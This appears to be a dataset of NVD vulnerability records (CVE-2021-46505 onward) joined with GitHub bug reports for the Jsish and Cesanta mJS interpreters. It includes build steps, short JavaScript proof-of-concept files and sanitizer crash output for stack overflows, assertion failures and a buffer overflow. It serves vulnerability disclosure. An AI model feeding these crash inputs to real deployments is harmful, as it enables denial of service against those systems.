[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/pcmacdon/jsish/issues/51
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript (function(){ var JSEtest = 1; for (var __loopvar3 = 0; JSEtest.length < (1) && __loopvar3 < 3; JSEtest.length++ + __loopvar3++) { JSEtest = 1; } })(); ``` ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js jsish: src/jsiEval.c:1020: jsiEvalSubscript: Assertion `vp != resPtr' failed. [2] 11225 abort jsish poc.js ``` Credits: Found by hopefly from OWL337.
Assertion `vp != resPtr' failed at jsiEval.c:1020: jsiEvalSubscript.
https://api.github.com/repos/pcmacdon/jsish/issues/51/comments
0
2021-12-24T09:40:19Z
2022-01-12T02:02:10Z
https://github.com/pcmacdon/jsish/issues/51
1,088,275,965
51
3,130
CVE-2021-46505
2022-01-27T21:15:09.277
Jsish v3.5.0 was discovered to contain a stack overflow via /usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/53" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "674" ]
674
https://github.com/pcmacdon/jsish/issues/53
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript function JSEtest(Function) { var a = Array.prototype.push.call(a, 42, 43); } for (var i = 0; i < 25000; i++) { JSEtest(Array); } ``` ​ ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ASAN:DEADLYSIGNAL ================================================================= ==9209==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd05e20e58 (pc 0x7f6abd3fb1e6 bp 0x7ffd05e216f0 sp 0x7ffd05e20e60 T0) #0 0x7f6abd3fb1e5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5) #1 0x5571122680fd in Jsi_NameLookup src/jsiUtils.c:413 #2 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119 #3 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466 #4 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119 #5 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466 #6 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119 #7 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466 #8 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119 #9 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466 ...... ...... ...... ...... ...... ...... #246 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119 #247 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466 #248 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119 #249 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466 #250 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119 SUMMARY: AddressSanitizer: stack-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5) ==9209==ABORTING ``` Credits: Found by OWL337 team.
Stack-overflow in (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5)
https://api.github.com/repos/pcmacdon/jsish/issues/53/comments
0
2021-12-24T09:43:02Z
2022-01-12T02:11:35Z
https://github.com/pcmacdon/jsish/issues/53
1,088,277,342
53
3,131
CVE-2021-46506
2022-01-27T21:15:09.323
There is an Assertion 'v->d.lval != v' failed at src/jsiValue.c in Jsish v3.5.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/52" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/52" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/pcmacdon/jsish/issues/52
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case ```javascript function applyTags(text, open, close, action) { var openTags = arguments; var lastOcr = text.indexOf(open), nextOpen, nextClose, iniBlock, updBlock; if (openTags.pop()) { openTags.push(lastOcr); } while (openTags.length > 0) { lastOcr = action; nextOpen = text.indexOf(open, lastOcr + open.length); nextClose = text.indexOf(close, lastOcr + open.length); } return text; } function JSEtest(text) { return text.toUpperCase(); } var text = '<lowcase> YEAH! </lowcase> Some <upcase> random <upcase> text </upcase> to </up$ text = applyTags(text, '<upcase>', '</upcase>', JSEtest); ``` ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js /home/user/poc.js:9: bug: Convert a unknown type: 0x6 to number (at or near "length") /home/user/poc.js:10: bug: Convert a unknown type: 0x6 to number (at or near "length") jsish: src/jsiValue.c:181: ValueFree: Assertion `v->d.lval != v' failed. [2] 116137 abort jsish poc.js ``` Credits: Found by OWL337 team.
Assertion `v->d.lval != v' failed at src/jsiValue.c:181: ValueFree.
https://api.github.com/repos/pcmacdon/jsish/issues/52/comments
0
2021-12-24T09:41:38Z
2022-01-12T02:03:28Z
https://github.com/pcmacdon/jsish/issues/52
1,088,276,639
52
3,132
CVE-2021-46507
2022-01-27T21:15:09.367
Jsish v3.5.0 was discovered to contain a stack overflow via Jsi_LogMsg at src/jsiUtils.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/54" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "674" ]
674
https://github.com/pcmacdon/jsish/issues/54
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
###### Jsish revision Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899) Version: v3.5.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash export CFLAGS='-fsanitize=address' make ``` ###### Test case1 ```javascript WebSocket({ "a": 2.3023e-320 }) ``` ###### Test case2 ```javascript var JSEtest = times(function () { WebSocket({ 'red': (new Object(null % null)) }); }) < times(log(null % null)); assert.sameValue(JSEtest.length, 2, 'newArr.length'); ``` ###### Execution steps & Output ```bash $ ./jsish/jsish poc.js ASAN:DEADLYSIGNAL ================================================================= ERROR: AddressSanitizer: stack-overflow on address 0x7ffe51210dfc (pc 0x55d8eb693014 bp 0x0fffca2427b6 sp 0x7ffe51210df0 T0) #0 0x55d8eb693013 in Jsi_LogMsg src/jsiUtils.c:151 #1 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526 #2 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229 #3 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526 #4 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229 #5 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526 #6 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229 ...... ...... ...... ...... ...... ...... #246 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229 #247 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526 #248 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229 #249 0x55d8eb655e02 in Jsi_ValueToString src/jsiValue.c:526 #250 0x55d8eb693929 in Jsi_LogMsg src/jsiUtils.c:229 SUMMARY: AddressSanitizer: stack-overflow src/jsiUtils.c:151 in Jsi_LogMsg ====ABORTING ``` Credits: Found by OWL337 team.
Stack-overflow src/jsiUtils.c:151 in Jsi_LogMsg
https://api.github.com/repos/pcmacdon/jsish/issues/54/comments
0
2021-12-24T09:43:48Z
2022-01-12T02:11:46Z
https://github.com/pcmacdon/jsish/issues/54
1,088,277,734
54
3,133
CVE-2021-46508
2022-01-27T21:15:09.413
There is an Assertion `i < parts_cnt' failed at src/mjs_bcode.c in Cesanta MJS v2.20.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/188" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/188" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/cesanta/mjs/issues/188
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_CLANG=clang $(DOCKER_CLANG) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (JSON.stringify([1, 2, 3]))((isNaN - 6.54321e2)(JSON.stringify([1, 2, 3]))); ``` </code></pre> </details> ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js mjs: src/mjs_bcode.c:121: struct mjs_bcode_part *mjs_bcode_part_get_by_offset(struct mjs *, size_t): Assertion `i < parts_cnt' failed. [1] 88797 abort mjs poc.js ``` Credits: Found by OWL337 team.
Assertion `i < parts_cnt' failed at src/mjs_bcode.c:121: struct mjs_bcode_part *mjs_bcode_part_get_by_offset(struct mjs *, size_t).
https://api.github.com/repos/cesanta/mjs/issues/188/comments
0
2021-12-31T05:23:32Z
2022-01-12T02:18:33Z
https://github.com/cesanta/mjs/issues/188
1,091,424,362
188
3,134
CVE-2021-46509
2022-01-27T21:15:09.460
Cesanta MJS v2.20.0 was discovered to contain a stack overflow via snquote at mjs/src/mjs_json.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/200" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/200" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "674" ]
674
https://github.com/cesanta/mjs/issues/200
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build steps ```bash vim Makefile DOCKER_CLANG=clang $(DOCKER_CLANG) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (JSON.stringify([1, 2, 3]))((JSON.parse - 6.5 - 321e2)(JSON.stringify([1, 2, 3]))); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js AddressSanitizer:DEADLYSIGNAL ================================================================= ==61262==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc3387c0b8 (pc 0x00000057a83c bp 0x7ffc338787d0 sp 0x7ffc33878338 T0) #0 0x57a83b in snquote /root/mjs/src/mjs_json.c:102:7 #1 0x57a83b in to_json_or_debug /root/mjs/src/mjs_json.c:167 #2 0x55178f in mjs_exec_internal /root/mjs/src/mjs_exec.c:1073:5 #3 0x552d2d in mjs_exec_file /root/mjs/src/mjs_exec.c:1096:11 #4 0x5821d3 in main /root/mjs/src/mjs_main.c:47:11 #5 0x7f82916bcb96 in __libc_start_main /build/glibc-2ORdQG/glibc-2.27/csu/../csu/libc-start.c:310 #6 0x41a2c9 in _start (/usr/local/bin/mjs+0x41a2c9) SUMMARY: AddressSanitizer: stack-overflow /root/mjs/src/mjs_json.c:102:7 in snquote ==61262==ABORTING ``` Credits: Found by OWL337 team.
Stack-overflow mjs/src/mjs_json.c:102:7 in snquote
https://api.github.com/repos/cesanta/mjs/issues/200/comments
0
2021-12-31T05:43:04Z
2022-01-12T02:20:01Z
https://github.com/cesanta/mjs/issues/200
1,091,428,300
200
3,135
CVE-2021-46510
2022-01-27T21:15:09.507
There is an Assertion `s < mjs->owned_strings.buf + mjs->owned_strings.len' failed at src/mjs_gc.c in Cesanta MJS v2.20.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/185" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/185" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/cesanta/mjs/issues/185
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc DOCKER_CLANG=clang $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (function () { ((function f(a) { if (a > 0) { if (gc(JSON.stringify({ translate: ({ enumerable: [ !Object.create ] }) })) !== f("switch(''){default:break;/*DUPTRY525*/}")('#1.1: -0 - -0 === 0. Actual: ' !== f(a - 1))) { f(a - 1) } } })(6)) })() ``` </code></pre> </details> ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js mjs: src/mjs_gc.c:354: gc_mark_string: Assertion `s < mjs->owned_strings.buf + mjs->owned_strings.len' failed. [1] 68013 abort mjs poc.js ``` Credits: Found by OWL337 team.
Assertion `s < mjs->owned_strings.buf + mjs->owned_strings.len' failed src/mjs_gc.c:354: gc_mark_string.
https://api.github.com/repos/cesanta/mjs/issues/185/comments
0
2021-12-31T05:20:39Z
2022-01-12T02:18:09Z
https://github.com/cesanta/mjs/issues/185
1,091,423,652
185
3,136
CVE-2021-46511
2022-01-27T21:15:09.550
There is an Assertion `m->len >= sizeof(v)' failed at src/mjs_core.c in Cesanta MJS v2.20.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/183" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/183" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/cesanta/mjs/issues/183
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (function() { ((function JSEtest(a) { if (a > 3) { if ([Object.create.apply({}, [Object])]) { JSEtest(Object.create.apply({}, [Object])) } } })(6)) })() ``` </code></pre> </details> ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js mjs: src/mjs_core.c:372: mjs_pop_val: Assertion `m->len >= sizeof(v)' failed. [1] 33895 abort mjs poc.js ``` Credits: Found by OWL337 team.
Assertion `m->len >= sizeof(v)' failed at src/mjs_core.c:372: mjs_pop_val
https://api.github.com/repos/cesanta/mjs/issues/183/comments
0
2021-12-31T05:18:57Z
2022-01-12T02:17:55Z
https://github.com/cesanta/mjs/issues/183
1,091,423,222
183
3,137
CVE-2021-46513
2022-01-27T21:15:09.633
Cesanta MJS v2.20.0 was discovered to contain a global buffer overflow via mjs_mk_string at mjs/src/mjs_string.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
